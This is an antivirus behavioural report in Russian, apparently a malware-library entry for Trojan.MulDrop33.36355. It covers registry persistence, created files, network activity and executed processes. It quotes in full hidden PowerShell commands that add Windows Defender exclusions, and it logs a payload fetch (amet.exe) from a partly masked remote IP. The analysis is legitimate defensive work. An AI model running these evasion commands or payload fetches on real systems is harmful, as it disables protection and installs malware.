Trojan.MulDrop33.36355

Техническая информация

Для обеспечения автозапуска и распространения

Модифицирует следующие ключи реестра

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'build.exe' = '%APPDATA%\build.exe'

Вредоносные функции

Для затруднения выявления своего присутствия в системе

добавляет исключения антивируса:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\jrwmup""
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath "C:\Users""

Создает и запускает на исполнение

'<Полный путь к файлу>' (загружен из сети Интернет)

Изменения в файловой системе

Создает следующие файлы

%TEMP%\ayfqigl.txt
%LOCALAPPDATA%\jrwmup\pasdp.exe
%APPDATA%\build.exe
%TEMP%\7z.dll
%TEMP%\7z.exe
%TEMP%\temp.zip
<SYSTEM32>\windowspowershell\v1.0\bin\cygwin1.dll
<SYSTEM32>\windowspowershell\v1.0\bin\quic_initial_www_google_com.bin
<SYSTEM32>\windowspowershell\v1.0\bin\tls_clienthello_4pda_to.bin
<SYSTEM32>\windowspowershell\v1.0\bin\tls_clienthello_www_google_com.bin
<SYSTEM32>\windowspowershell\v1.0\bin\windivert.dll
<SYSTEM32>\windowspowershell\v1.0\bin\windivert64.sys
<SYSTEM32>\windowspowershell\v1.0\bin\winws.exe
<SYSTEM32>\windowspowershell\v1.0\general (alt).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt10).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt2).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt3).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt4).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt5).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt6).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt7).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt8).bat
<SYSTEM32>\windowspowershell\v1.0\general (alt9).bat
<SYSTEM32>\windowspowershell\v1.0\general (fake tls auto alt).bat
<SYSTEM32>\windowspowershell\v1.0\general (fake tls auto alt2).bat
<SYSTEM32>\windowspowershell\v1.0\general (fake tls auto alt3).bat
<SYSTEM32>\windowspowershell\v1.0\general (fake tls auto).bat
<SYSTEM32>\windowspowershell\v1.0\general (simple fake alt).bat
<SYSTEM32>\windowspowershell\v1.0\general (simple fake).bat
<SYSTEM32>\windowspowershell\v1.0\general.bat
<SYSTEM32>\windowspowershell\v1.0\lists\ipset-all.txt
<SYSTEM32>\windowspowershell\v1.0\lists\ipset-all.txt.backup
<SYSTEM32>\windowspowershell\v1.0\lists\ipset-exclude.txt
<SYSTEM32>\windowspowershell\v1.0\lists\list-exclude.txt
<SYSTEM32>\windowspowershell\v1.0\lists\list-general.txt
<SYSTEM32>\windowspowershell\v1.0\lists\list-google.txt
<SYSTEM32>\windowspowershell\v1.0\service.bat

Удаляет файлы, которые сам же создал

%TEMP%\temp.zip
%TEMP%\7z.dll
%TEMP%\7z.exe

Сетевая активность

Подключается к

'62.##.226.16':5553
'ra#.####ubusercontent.com':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443
'mo#####.map.fastly.net':443
'co##############e-chains.prod.autograph.services.mozaws.net':443

TCP

Запросы HTTP GET

http://62.##.226.16:5553/amet.exe via 62.##.226.16

Другие

'ra#.####ubusercontent.com':443
'gi##ub.com':443

UDP

DNS ASK dn#.google
DNS ASK ra#.####ubusercontent.com
DNS ASK gi##ub.com
DNS ASK re#########ets.githubusercontent.com
DNS ASK mo#####.map.fastly.net
DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
'dn#.google':443
'18#.#14.97.1':443

Другое

Создает и запускает на исполнение

'%LOCALAPPDATA%\jrwmup\pasdp.exe'
'%APPDATA%\build.exe'
'%TEMP%\7z.exe' x %TEMP%\\temp.zip -o"<SYSTEM32>\WindowsPowerShell\v1.0" -spe -y

Запускает на исполнение

'<SYSTEM32>\cmd.exe' /C powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\jrwmup"" (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath "C:\Users"" (со скрытым окном)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (со скрытым окном)
'<SYSTEM32>\svchost.exe' -k LocalSystemNetworkRestricted -p -s UmRdpService